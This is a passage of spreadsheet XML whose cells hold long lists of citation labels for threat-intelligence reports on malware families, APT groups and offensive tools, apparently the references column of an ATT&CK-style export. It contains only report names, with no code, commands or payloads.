    <t>(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Dragos Threat Report 2020),(Citation: Secureworks Karagany July 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: KISA Operation Muzabi),(Citation: NCCGroup RokRat Nov 2018),(Citation: Cybereason Valak May 2020),(Citation: Cybereason Molerats Dec 2020),(Citation: Trend Micro njRAT 2018),(Citation: SecureList Silence Nov 2017),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: CISA EB Aug 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Unit 42 Nokki Oct 2018),(Citation: PWC KeyBoys Feb 2017),(Citation: Unit42 Sofacy Dec 2018),(Citation: ESET Sednit Part 2),(Citation: Talos PoetRAT April 2020),(Citation: f-secure janicab),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Microsoft FinFisher March 2018),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Zscaler Kasidet),(Citation: Unit 42 Gamaredon February 2022),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: Cylance Cleaver),(Citation: TrendMicro Ursnif Mar 2015),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: US-CERT TA18-074A),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: CopyKittens Nov 2015),(Citation: Fortinet Agent Tesla June 2017),(Citation: DOJ GRU Indictment Jul 2018),(Citation: McAfee Netwire Mar 2015),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Nccgroup Gh0st April 2018),(Citation: Talos Oblique RAT March 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: objsee mac malware 2017),(Citation: Symantec Chafer Dec 2015),(Citation: jRAT Symantec Aug 2018),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Symantec Dragonfly Sept 2017),(Citation: Zscaler Cobian Aug 2017),(Citation: GitHub Pupy),(Citation: 360 Machete Sep 2020),(Citation: Riskiq Remcos Jan 2018),(Citation: Cylance Machete Mar 2017),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Profero APT27 December 2020),(Citation: F-Secure Cosmicduke),(Citation: Securelist Octopus Oct 2018),(Citation: FireEye Shining A Light on DARKSIDE May 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Symantec Catchamas April 2018),(Citation: Securelist ScarCruft May 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: FireEye SMOKEDHAM June 2021),(Citation: FireEye APT33 Sept 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: FireEye MuddyWater Mar 2018),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ESET Zebrocy Nov 2018),(Citation: cobaltstrike manual),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Palo Alto Rover),(Citation: FireEye APT10 Sept 2018),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: FinFisher Citation),(Citation: Trend Micro Iron Tiger April 2021),(Citation: CISA Zebrocy Oct 2020),(Citation: Gigamon Berserk Bear October 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: XAgentOSX 2017),(Citation: ESET Zebrocy May 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Talos ROKRAT),(Citation: Kaspersky StoneDrill 2017),(Citation: Kaspersky Flame),(Citation: trendmicro xcsset xcode project 2020),(Citation: Accenture Hogfish April 2018),(Citation: Anomali Static Kitten February 2021),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Symantec Chafer February 2018),(Citation: Trend Micro Tick November 2019),(Citation: Unit42 Redaman January 2019),(Citation: Security Affairs DustSquad Oct 2018),(Citation: Talos Konni May 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: CheckPoint Naikon May 2020),(Citation: FireEye APT34 Dec 2017),(Citation: ESET Machete July 2019),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Threatpost Lizar May 2021),(Citation: Unit 42 Kazuar May 2017),(Citation: Unit42 RDAT July 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Unit42 Emissary Panda May 2019),(Citation: Fortinet Agent Tesla April 2018),(Citation: Citizen Lab Group5),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Janicab),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: ESET DazzleSpy Jan 2022),(Citation: Antiy CERT Ramsay April 2020),(Citation: Symantec Dragonfly),(Citation: TrendMicro BlackTech June 2017),(Citation: Kaspersky TajMahal April 2019),(Citation: Bitdefender Naikon April 2021),(Citation: GDATA Zeus Panda June 2017),(Citation: Korean FSI TA505 2020),(Citation: Talos Seduploader Oct 2017),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: Objective-See MacMa Nov 2021),(Citation: Talos ROKRAT 2),(Citation: FireEye APT41 Aug 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Microsoft Actinium February 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Kaspersky Adwind Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: CIRCL PlugX March 2013),(Citation: DOJ FIN7 Aug 2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: ASERT Donot March 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Proofpoint NETWIRE December 2020),(Citation: FireEye CARBANAK June 2017),(Citation: GitHub Sliver Screen),(Citation: Securelist Remexi Jan 2019),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Radware Micropsia July 2018),(Citation: Prevx Carberp March 2011),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: GitHub PowerSploit May 2012),(Citation: SecureList Griffon May 2019),(Citation: Trend Micro Daserf Nov 2017),(Citation: ESET InvisiMole June 2020),(Citation: Forcepoint Monsoon),(Citation: Symantec Hydraq Jan 2010),(Citation: Group IB Silence Sept 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),</t>
  </si>
  <si>
    <t>(Citation: ESET Lazarus Jun 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: Malwarebytes Kimsuky June 2021),</t>
  </si>
  <si>
    <t>(Citation: Phish Labs Silent Librarian),(Citation: Proofpoint TA407 September 2019),(Citation: Google EXOTIC LILY March 2022),(Citation: DOJ Iran Indictments March 2018),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: KISA Operation Muzabi),</t>
  </si>
  <si>
    <t>,(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: ITSyndicate Disabling PHP functions),(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>(Citation: Unit 42 RGDoor Jan 2018),(Citation: CrowdStrike IceApple May 2022),(Citation: ESET IIS Malware 2021),(Citation: Dell TG-3390),(Citation: Microsoft ISAPICGIRestriction 2016)</t>
  </si>
  <si>
    <t>(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Dragos Crashoverride 2018),</t>
  </si>
  <si>
    <t>,(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>(Citation: ESET LightNeuron May 2019),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: CISA AA21-200A APT40 July 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Guidepoint SUPERNOVA Dec 2020),(Citation: Microsoft GALLIUM December 2019),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: CISA AA20-301A Kimsuky),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Unit42 SUPERNOVA Dec 2020),(Citation: FireEye APT40 March 2019),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: Microsoft HAFNIUM March 2020),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Volexity OceanLotus Nov 2017),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Tarrask scheduled task),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye APT39 Jan 2019),(Citation: Unit 42 Playbook Dec 2017),(Citation: CISA Supernova Jan 2021),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Volexity Exchange Marauder March 2021),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Exchange Mar 2021),(Citation: US-CERT TA18-074A),(Citation: FireEye TRITON 2019),(Citation: ANSSI Sandworm January 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Dell TG-3390),(Citation: Lee 2013),(Citation: CrowdStrike Deep Panda Web Shells),(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: ITSyndicate Disabling PHP functions)</t>
  </si>
  <si>
    <t>(Citation: Qualys Hermetic Wiper March 2022),(Citation: Trend Micro Ransomware February 2021),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: McAfee Cuba April 2021),(Citation: CrowdStrike Ryuk January 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: Trend Micro KillDisk 2),(Citation: Dragos EKANS),(Citation: Dragos Crashoverride 2017),(Citation: Secureworks REvil September 2019),(Citation: Talos Olympic Destroyer 2018),(Citation: TrendMicro Netwalker May 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: Check Point Meteor Aug 2021),(Citation: Fortinet Diavol July 2021),(Citation: Intel 471 REvil March 2020),(Citation: FireEye Ransomware Feb 2020),(Citation: Palo Alto Unit 42 EKANS),(Citation: CERT-FR PYSA April 2020),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Arxiv Avaddon Feb 2021),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: FireEye WannaCry 2017),(Citation: SecureWorks WannaCry Analysis),(Citation: Sophos Maze VM September 2020),(Citation: IBM MegaCortex),(Citation: Sophos Ragnar May 2020),(Citation: Unit42 Clop April 2021),(Citation: CarbonBlack Conti July 2020),(Citation: McAfee Babuk February 2021),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Symantec WastedLocker June 2020),(Citation: Check Point Pay2Key November 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Mcafee Clop Aug 2019),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN7 Oct 2019),(Citation: Prevailion DarkWatchman 2021),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: CyberBit Dtrack),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: ESET PipeMon May 2020),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: Symantec Hydraq Jan 2010),(Citation: ESET Attor Oct 2019),(Citation: Trend Micro KillDisk 1),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Gh0stRAT ATT March 2019),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: MSTIC FoggyWeb September 2021),</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Sept 2018),(Citation: FireEye APT32 May 2017),(Citation: Dell TG-1314),(Citation: Dell Wiper),</t>
  </si>
  <si>
    <t>(Citation: Cybereason Kimsuky November 2020),(Citation: Kaspersky TajMahal April 2019),(Citation: ESET InvisiMole June 2018),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET ComRAT May 2020),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Bahamut),(Citation: Kaspersky Lyceum October 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: Checkpoint Dridex Jan 2021),(Citation: Malwarebytes Dyreza November 2015),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Trend Micro Tick November 2019),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Cybereason Bazar July 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: Symantec Inception Framework March 2018),(Citation: ESET ForSSHe December 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: ATT Sidewinder January 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: MacKeeper Bundlore Apr 2019),(Citation: ESET RTM Feb 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FoxIT Wocao December 2019),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cylance Dust Storm),(Citation: ANSSI Sandworm January 2021),(Citation: Group IB Ransomware September 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET InvisiMole June 2020),(Citation: Check Point APT35 CharmPower January 2022),(Citation: FireEye Metamorfo Apr 2018),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: wardle evilquest parti),(Citation: KISA Operation Muzabi),(Citation: Cybereason Valak May 2020),(Citation: Cybereason Molerats Dec 2020),(Citation: Prevailion EvilNum May 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Baumgartner Naikon 2015),(Citation: BlackBerry Bahamut),(Citation: ESET Casbaneiro Oct 2019),(Citation: McAfee Gold Dragon),(Citation: Cylance Shell Crew Feb 2017),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder APT April 2020),(Citation: ESET Gelsemium June 2021),(Citation: Zscaler Kasidet),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Kaspersky Turla),(Citation: Kaspersky Flame Functionality),(Citation: Kaspersky QakBot September 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Microsoft DUBNIUM June 2016),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Unit 42 Rocke January 2019),(Citation: Talos Promethium June 2020),(Citation: jRAT Symantec Aug 2018),(Citation: Microsoft Tasklist),(Citation: Palo Alto Comnie),(Citation: Trend Micro Waterbear December 2019),(Citation: DFIR Ryuk's Return October 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: TrendMicro TropicTrooper 2015),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bazar July 2020),(Citation: TechNet Netsh),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Security Affairs SILENTTRINITY July 2019),(Citation: FoxIT Wocao December 2019),(Citation: Symantec Bumblebee June 2022),(Citation: Proofpoint TA505 Mar 2018),(Citation: Securelist BlackOasis Oct 2017),(Citation: BiZone Lizar May 2021),(Citation: FireEye MuddyWater Mar 2018),(Citation: Talos Frankenstein June 2019),(Citation: Mcafee Clop Aug 2019),(Citation: Trend Micro Skidmap),(Citation: Forcepoint Felismus Mar 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: F-Secure CozyDuke),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: FinFisher Citation),(Citation: Morphisec ShellTea June 2019),(Citation: TechNet Netsh Firewall),(Citation: Checkpoint IndigoZebra July 2021),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Cisco Talos Intelligence Group),(Citation: Palo Alto T9000 Feb 2016),(Citation: TrendMicro Netwalker May 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Kaspersky StoneDrill 2017),(Citation: Check Point Meteor Aug 2021),(Citation: Kaspersky Flame),(Citation: trendmicro xcsset xcode project 2020),(Citation: FireEye SUNBURST Additional Details Dec 2020),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Unit 42 WhisperGate January 2022),(Citation: FireEye APT34 Dec 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Prevailion DarkWatchman 2021),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Talos Zeus Panda Nov 2017),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cymmetria Patchwork),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Crowdstrike Qakbot October 2020),(Citation: Cybereason Clop Dec 2020),(Citation: Kaspersky TajMahal April 2019),(Citation: ESET Dukes October 2019),(Citation: GDATA Zeus Panda June 2017),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ESET ComRAT May 2020),(Citation: Talos Micropsia June 2017),(Citation: DustySky),(Citation: Microsoft SIR Vol 21),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Talos Cobalt Group July 2018),(Citation: BlackBerry Amadey 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: ATT QakBot April 2021),(Citation: ESET PipeMon May 2020),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: Prevx Carberp March 2011),(Citation: Microsoft PLATINUM April 2016),(Citation: Radware Micropsia July 2018),(Citation: ESET InvisiMole June 2020),</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA416 Europe March 2022),</t>
  </si>
  <si>
    <t>(Citation: Volexity Ocean Lotus November 2020),(Citation: Unit 42 ProjectM March 2016),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Gigamon Berserk Bear October 2021),(Citation: Gallagher 2015),(Citation: Talos Transparent Tribe May 2021),</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Proofpoint TA407 September 2019),(Citation: Secureworks COBALT DICKENS September 2019),</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),(Citation: McAfee Lazarus Nov 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Korean FSI TA505 2020),(Citation: ESET Lazarus Jun 2020),(Citation: McAfee Night Dragon),(Citation: Talos Kimsuky Nov 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: ClearSky Lazarus Aug 2020),(Citation: ESET Operation Spalax Jan 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Microsoft Actinium February 2022),(Citation: Unit 42 Gamaredon February 2022),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Lacework TeamTNT May 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Volexity Ocean Lotus November 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: MalwareBytes LazyScripter Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: Mandiant UNC3890 Aug 2022),(Citation: Dell TG-3390),(Citation: ESET Lazarus Jun 2020),</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: Peirates GitHub),(Citation: Trend Micro Pawn Storm OAuth 2017),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: ESET EvilNum July 2020),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: IBM Grandoreiro April 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Kroll Qakbot June 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Prevailion EvilNum May 2020),(Citation: Evilginx 2 July 2018)</t>
  </si>
  <si>
    <t>(Citation: Mandiant APT29 Trello),(Citation: AADInternals Documentation),(Citation: Adsecurity Mimikatz Guide),(Citation: GitHub Certify),(Citation: GitHub PSPKIAudit),(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>,(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: STIG krbtgt reset)</t>
  </si>
  <si>
    <t>,(Citation: Microsoft Preauthentication Jul 2012),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)</t>
  </si>
  <si>
    <t>(Citation: Github PowerShell Empire),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: NCC Group APT15 Alive and Strong),(Citation: GitHub Mimikatz kerberos Module),(Citation: STIG krbtgt reset)</t>
  </si>
  <si>
    <t>(Citation: DFIR Ryuk's Return October 2020),(Citation: Harmj0y Kerberoast Nov 2016),(Citation: PowerSploit Invoke Kerberoast),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Impacket Tools),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Github PowerShell Empire),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: FoxIT Wocao December 2019),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: Github PowerShell Empire),(Citation: GitHub Mimikatz kerberos Module),(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Wikipedia HPKP),(Citation: SpectorOps Code Signing Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Cybereason TA505 April 2019),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Symantec Nerex May 2012),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Kaspersky Winnti April 2013),(Citation: ESET GreyEnergy Oct 2018),(Citation: Wired Lockergoga 2019),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ESET Hermetic Wizard March 2022),(Citation: ESET Lazarus Jun 2020),(Citation: Volexity Patchwork June 2018),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Microsoft GALLIUM December 2019),(Citation: ESET Ebury Feb 2014),(Citation: Medium Metamorfo Apr 2020),(Citation: Unit 42 BackConfig May 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: ThreatConnect Kimsuky September 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: FireEye Operation Molerats),(Citation: Securelist APT10 March 2021),(Citation: Trend Micro TA505 June 2019),(Citation: ESET Hermetic Wiper February 2022),(Citation: FireEye APT40 March 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Symantec Suckfly March 2016),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: JPCERT ChChes Feb 2017),(Citation: ClearSky OilRig Jan 2017),(Citation: Cybereason Bazar July 2020),(Citation: Lazarus APT January 2022),(Citation: Group IB Silence Aug 2019),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: ESET Gazer Aug 2017),(Citation: Kaspersky Darkhotel),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: McAfee Honeybee),(Citation: Securelist WhiteBear Aug 2017),(Citation: ESET RTM Feb 2017),(Citation: ATT QakBot April 2021),(Citation: Kaspersky Turla),(Citation: ESET PipeMon May 2020),(Citation: Palo Alto menuPass Feb 2017),(Citation: CheckPoint Bandook Nov 2020),(Citation: ClearSky Wilted Tulip July 2017),(Citation: FireEye CARBANAK June 2017),(Citation: Unit42 Clop April 2021),(Citation: FireEye Periscope March 2018),(Citation: Cyberreason Anchor December 2019),(Citation: FireEye FIN7 Oct 2019),(Citation: FireEye FIN7 Aug 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: Group IB APT 41 June 2021),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Symantec Tick Apr 2016),(Citation: Janicab),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec Ukraine Wipers February 2022),</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021),(Citation: F-Secure BlackEnergy 2014),(Citation: GitHub Turla Driver Loader),(Citation: FBI FLASH APT39 September 2020),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Unit42 AcidBox June 2020),(Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>(Citation: objectivesee osx.shlayer apple approved 2020),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Application Bundle Manipulation Brandon Dalton),(Citation: Carbon Black Shlayer Feb 2019),(Citation: 20 macOS Common Tools and Techniques),(Citation: CoinTicker 2019),(Citation: ESET DazzleSpy Jan 2022),(Citation: Shlayer jamf gatekeeper bypass 2021),</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Retefe),(Citation: hexed osx.dok analysis 2019),(Citation: ESET RTM Feb 2017),(Citation: FireEye HIKIT Rootkit Part 2),(Citation: Unit42 Redaman January 2019),(Citation: objsee mac malware 2017),(Citation: Wikipedia HPKP),(Citation: SpectorOps Code Signing Dec 2017)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro TA505 Aug 2019),(Citation: ESET T3 Threat Report 2021),(Citation: Korean FSI TA505 2020),(Citation: GitHub MOTW),(Citation: Dormann Dangers of VHD 2019)</t>
  </si>
  <si>
    <t>,(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>(Citation: trendmicro xcsset xcode project 2020),(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: Talos CCleanup 2017),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Gigamon Berserk Bear October 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: Secureworks REvil September 2019),(Citation: Avast CCleaner3 2018),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: FireEye APT41 Aug 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: Secureworks NotPetya June 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: ESET Telebots June 2017),(Citation: Intezer Aurora Sept 2017),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Secureworks GOLD SOUTHFIELD),(Citation: MSTIC Nobelium Oct 2021),(Citation: OWASP Top 10)</t>
  </si>
  <si>
    <t>(Citation: Lazarus APT January 2022),(Citation: Qualys LolZarus),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Talos Cobalt Group July 2018),(Citation: Morphisec Cobalt Gang Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Aug 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Palo Alto OilRig May 2016),(Citation: Cofense Astaroth Sept 2018),(Citation: Group IB Silence Sept 2018),(Citation: Kaspersky Lazarus Under The Hood APR 2017),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: SecureList Silence Nov 2017),</t>
  </si>
  <si>
